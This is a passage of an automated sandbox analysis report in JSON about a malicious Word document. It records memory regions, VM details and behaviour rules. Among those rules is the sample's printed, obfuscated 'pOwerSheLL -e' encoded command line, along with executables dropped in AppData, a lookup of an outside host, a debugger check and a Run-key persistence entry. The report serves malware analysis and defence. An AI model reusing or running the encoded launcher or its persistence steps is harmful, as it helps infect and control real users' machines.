1934098432, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_2610", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1934098432, "timestamp": "00:02:08.396", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_2611", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:02:08.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_2612", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:02:08.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 589824, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 35586047, "entry_point": 0, "filename": null, "id": "region_2613", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:02:08.401", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30343167, "entry_point": 0, "filename": null, "id": "region_2614", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:02:08.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 37879808, "type": "region", "version": 1 }, "end_va": 39976959, "entry_point": 0, "filename": null, "id": "region_2615", "name": "private_0x0000000002420000", "norm_filename": null, "region_type": "private_memory", "start_va": 37879808, "timestamp": "00:02:08.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 35586048, "type": "region", "version": 1 }, "end_va": 36634623, "entry_point": 0, "filename": null, "id": "region_2616", "name": "private_0x00000000021f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35586048, "timestamp": "00:02:08.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1869545472, "type": "region", "version": 1 }, "end_va": 1869570047, "entry_point": 1869545472, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_2617", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1869545472, "timestamp": "00:02:08.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 39583744, "type": "region", "version": 1 }, "end_va": 40632319, "entry_point": 0, "filename": null, "id": "region_2618", "name": "private_0x00000000025c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39583744, "timestamp": "00:02:08.420", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1909522432, "type": "region", "version": 1 }, "end_va": 1909587967, "entry_point": 1909522432, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_2619", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1909522432, "timestamp": "00:02:08.420", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_2620", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:02:08.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1909391360, "type": "region", "version": 1 }, "end_va": 1909465087, "entry_point": 1909391360, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_2621", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1909391360, "timestamp": "00:02:08.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1957494784, "type": "region", "version": 1 }, "end_va": 1957740543, "entry_point": 1957494784, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_2622", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1957494784, "timestamp": "00:02:08.434", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1909325824, "type": "region", "version": 1 }, "end_va": 1909358591, "entry_point": 1909325824, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_2623", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1909325824, "timestamp": "00:02:08.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1952579584, "type": "region", "version": 1 }, "end_va": 1952600063, "entry_point": 1952579584, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_2624", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1952579584, "timestamp": "00:02:08.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1957429248, "type": "region", "version": 1 }, "end_va": 1957453823, "entry_point": 1957429248, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_2625", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1957429248, "timestamp": "00:02:08.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1931739136, "type": "region", "version": 1 }, "end_va": 1931968511, "entry_point": 1931739136, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_2626", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1931739136, "timestamp": "00:02:08.457", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 }, { "comment": "The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 }, { "comment": "The operating system was rebooted during the analysis.", "id": 128, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "sample_file.doc", "id": 19564, "md5_hash": "e3f53eb751acc7eb18645753a15a1325", "sample_type": "word_document", "sha1_hash": "b98d80994ef3f6a66ce37fabcb862752673de8d5", "sha256_hash": "455be9278594633944bfdada541725a55e5ef3b7189ae13be8b311848d473b53", "size": 60416, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 255562, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_19171.png", "size": 255576, "thumbnail_archive_path": "screenshots/thumbnail_19171.png", "timestamp": "00:00:19.171", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_24436.png", "size": 255779, "thumbnail_archive_path": "screenshots/thumbnail_24436.png", "timestamp": "00:00:24.436", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_26437.png", "size": 152095, "thumbnail_archive_path": "screenshots/thumbnail_26437.png", "timestamp": "00:00:26.437", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_32691.png", "size": 151544, "thumbnail_archive_path": "screenshots/thumbnail_32691.png", "timestamp": "00:00:32.691", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_88184.png", "size": 57088, "thumbnail_archive_path": "screenshots/thumbnail_88184.png", "timestamp": "00:01:28.184", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_89478.png", "size": 53725, "thumbnail_archive_path": "screenshots/thumbnail_89478.png", "timestamp": "00:01:29.478", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_91186.png", "size": 4185, "thumbnail_archive_path": "screenshots/thumbnail_91186.png", "timestamp": "00:01:31.186", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_93207.png", "size": 489395, "thumbnail_archive_path": "screenshots/thumbnail_93207.png", "timestamp": "00:01:33.207", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_104499.png", "size": 4187, "thumbnail_archive_path": "screenshots/thumbnail_104499.png", "timestamp": "00:01:44.499", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_105560.png", "size": 488943, "thumbnail_archive_path": "screenshots/thumbnail_105560.png", "timestamp": "00:01:45.560", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_113098.png", "size": 55375, "thumbnail_archive_path": "screenshots/thumbnail_113098.png", "timestamp": "00:01:53.098", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_114106.png", "size": 83471, "thumbnail_archive_path": "screenshots/thumbnail_114106.png", "timestamp": "00:01:54.106", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-09-28 17:24", "analyzer_version": "2.2.0", "chrome_version": "58.0.3029.110", "firefox_version": "25.0", "flash_version": "10.3.183.90", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.600", "microsoft_excel_version": "15.0.4569.1504", "microsoft_office_version": "15.0.4569.1504", "microsoft_power_point_version": "15.0.4569.1504", "microsoft_project_version": "15.0.4569.1504", "microsoft_publisher_version": "15.0.4569.1504", "microsoft_visio_version": "15.0.4569.1504", "microsoft_word_version": "15.0.4569.1504", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_32-bit_pae", "vm_kernel_version": "6.1.7601.17514_(684da42a-30cc-450f-81c5-35b4d18944b1)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_69", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAU\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1014", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "70.39.145.109", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_1046", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"neakmedia.com\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1102", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_debugger", "operation_desc": "Try to detect debugger", "ref_gfncalls": [ { "ref_id": "gfn_1129", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_debugger_by_api", "technique_desc": "Check via API \"IsDebuggerPresent\".", "technique_path": "built_in._anti_analysis._detect_debugger.vmray_detect_debugger_by_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "MACA73F0A", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_2199", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"MACA73F0A\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\I78B95E2E", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3289", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\I78B95E2E\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\M78B95E2E", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3290", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\M78B95E2E\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_3304", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "MA991ED3B", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_4375", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"MA991ED3B\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_5494", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_5497", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { 